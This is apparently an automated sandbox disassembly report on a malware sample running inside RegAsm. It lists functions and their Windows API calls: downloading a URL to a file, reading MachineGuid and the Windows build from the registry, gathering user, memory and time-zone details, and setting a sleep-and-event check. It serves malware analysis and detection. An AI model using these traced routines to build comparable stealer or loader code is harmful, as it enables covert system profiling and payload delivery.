InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
InternetCloseHandle.WININET(00000000), ref: 004059BB
InternetCloseHandle.WININET(00000000), ref: 004059C2

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction ID: 13221a786792afbe71e2db2b5b3dd3a866a49aaf32af835bc09817eda76de5d3
Opcode Fuzzy Hash: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction Fuzzy Hash: 8C518F75500249EBDB10DBA0CC46FEE77B8EB05704F60416AFA01E72C1DB786A48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004043C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00404412
??_U@YAPAXI@Z.MSVCRT ref: 0040441F
??_U@YAPAXI@Z.MSVCRT ref: 0040442C
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Strings

zZ@, xrefs: 0040443D, 0040444D, 0040446B
zZ@, xrefs: 0040447A
<, xrefs: 00404402

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <$zZ@$zZ@
API String ID: 1274457161-2926614232
Opcode ID: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
Instruction ID: 5ec785183fc32c623f1de6a7566c658e8ea65be6cb1651013de8fb2e27aaef0e
Opcode Fuzzy Hash: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
Instruction Fuzzy Hash: 1C2160B5900208EBDB00DFA4D885BDD7BB8FF05724F14022AFA25A72C1DB395A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB50 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,012BF850,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040EBB0
StrCmpCA.SHLWAPI(00000000,012BF860,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040EC3A
StrCmpCA.SHLWAPI(00000000,012BF8B0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040ED6A

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

StrCmpCA.SHLWAPI(00000000,012BF850), ref: 0040EE24
StrCmpCA.SHLWAPI(00000000,012BF860), ref: 0040EEB0

Strings

Stable\, xrefs: 0040EC7D
Stable\, xrefs: 0040EEF3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\
API String ID: 3722407311-4033978473
Opcode ID: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction ID: d8ce4b8c1e13b8f110d5154c309a70af36248a3d2e26b75c81aeb3fa987dec21
Opcode Fuzzy Hash: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction Fuzzy Hash: E4E1CA70900248DBCB14EFA9C946BDDBBB5AF59304F10C16EF945A7382DB785608C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00418860 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00418970: LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
Part of subcall function 00418970: GetProcAddress.KERNEL32(00000000,012AF2E8), ref: 00418990
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF360), ref: 004189BD
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF1C8), ref: 004189D6
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF1E0), ref: 004189EE
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF4B0), ref: 00418A06
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012B2DC0), ref: 00418A1F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012B2A80), ref: 00418A37
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012B2A20), ref: 00418A4F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF4C8), ref: 00418A68
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF4E0), ref: 00418A80
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF528), ref: 00418A98
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF4F8), ref: 00418AB1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012B2B60), ref: 00418AC9
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF510), ref: 00418AE1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,012AF480), ref: 00418AFA

Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00401090: CreateDCA.GDI32(012B2F30,00000000,00000000,00000000), ref: 0040109D
Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,012B2DE0), ref: 004102A7

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012B2DE0,?,00428884,?,00000000,004283B2), ref: 004188F6
CloseHandle.KERNEL32(00000000), ref: 00418901
Sleep.KERNEL32(00001B58), ref: 0041890C
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418922
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041893C
CloseHandle.KERNEL32(00000000), ref: 0041894A
ExitProcess.KERNEL32 ref: 00418952

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
String ID:
API String ID: 3108587868-0
Opcode ID: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction ID: 647acd411ead89d836921b015eed4027088bc395b0a35a31edabbaa9f7aa6c77
Opcode Fuzzy Hash: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction Fuzzy Hash: BA217F309001096AD700F7F1DC56FEE7369AF05709F50012EF606B60D2DF7C2989866D

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CB5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
CharToOemA.USER32(00000000,?), ref: 00410D12

Strings

MachineGuid, xrefs: 00410CEE
SOFTWARE\Microsoft\Cryptography, xrefs: 00410CC8

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction ID: 734486b7100e6d63ed2b29b9d7cba1e03fbf9e6038e99d6900f302105bc7df50
Opcode Fuzzy Hash: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction Fuzzy Hash: 8601B579640219ABD724DB90DC4AFE97778AB14704F104199B645621C0DAB46A858B50

Uniqueness

Uniqueness Score: -1.00%

Function 004106E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
wsprintfA.USER32 ref: 0041073B

Strings

@, xrefs: 0041070E
%d MB, xrefs: 00410735

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction ID: 3858def785d9e4baa448147c13a215b95796b3cfcd3afa1d1fab1a2876bbce8c
Opcode Fuzzy Hash: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction Fuzzy Hash: A3F09675A40118ABE7149BA4EC1AFFE77ADEB01701F500119F706D72C0DBB89C4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406E40 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
LocalFree.KERNEL32(?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE1
CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction ID: fca360b4b4926ce2ce86bd9a704f617748b4363ecef1e2cd769cd9a162bdc231
Opcode Fuzzy Hash: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction Fuzzy Hash: 0F214CB560020AAFDB10DFA4DC84FAF77A9EB49714F10022AF912A72C0D7389D51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407240 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

GetEnvironmentVariableA.KERNEL32(012BF980,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,00000000,012C3200,?,00427A64,?,?,012C30E0,012C30E0,00427A5F,?), ref: 00407311

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

SetEnvironmentVariableA.KERNEL32(012BF980,00000000,00000000,hzB,?,?,00427A68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00427A63), ref: 0040738E
LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00420658,000000FF,?,0040BE2B), ref: 004073A9

Strings

hzB, xrefs: 00407349, 00407366, 0040734D
C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040730B, 00407324

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$hzB
API String ID: 2929475105-2770337157
Opcode ID: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction ID: 579015a8dc8e7fb9ba4dc0b4b2d1472570f0f46b00a7972d46a8666dc34995d3
Opcode Fuzzy Hash: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction Fuzzy Hash: DC71E570900249DEDB04EBE4D846BEEBBB9AF1A304F14417EF905672D1DF781A48C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00415650 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

fA, xrefs: 004156F1, 004157B3, 004156F4
fA, xrefs: 004157CA

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: fA$fA
API String ID: 4198075804-1630953348
Opcode ID: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction ID: 4a7e4500b8fefa130c25cbd9421f046c1ba1e46fcba1c1cc5636780b9c3006f8
Opcode Fuzzy Hash: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction Fuzzy Hash: 40412D74801249EADB11EFA5C981BDDBBB4AB19304F50407EE906676C2DF781A4CCBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410F40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 00410200: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
Part of subcall function 00410200: HeapAlloc.KERNEL32(00000000), ref: 0041021C
Part of subcall function 00410200: RegOpenKeyExA.KERNEL32(80000002,012BB5B8,00000000,00020119,?), ref: 0041023B
Part of subcall function 00410200: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

RegOpenKeyExA.KERNEL32(80000002,012BB5B8,00000000,00020119,00000000), ref: 00410F91
RegQueryValueExA.KERNEL32(00000000,012C2F60,00000000,00000000,00000000,000000FF), ref: 00410FAC

Strings

Windows 11, xrefs: 00410F70

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction ID: 53ce30e9246303524b4cf8f670f0acc819984a5071f51573bc99cb0a8d9a2c5a
Opcode Fuzzy Hash: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction Fuzzy Hash: C701267860020AFBD714DBA0EC4EEABB7BDEB45B01F104159FA04D7250D6B45D80C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00410200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
HeapAlloc.KERNEL32(00000000), ref: 0041021C
RegOpenKeyExA.KERNEL32(80000002,012BB5B8,00000000,00020119,?), ref: 0041023B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

Strings

CurrentBuildNumber, xrefs: 0041024F

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction ID: 4c14057a90075943bc9431615e63d58b06497ca245fa930b3837fb80e640c4dc
Opcode Fuzzy Hash: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction Fuzzy Hash: 4AF0AFB9540205BBE7109BA0EC4EFABBBADEF49B01F500155FA0596280E6B45A44C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417F00 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 660networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B2D00), ref: 00418CC5
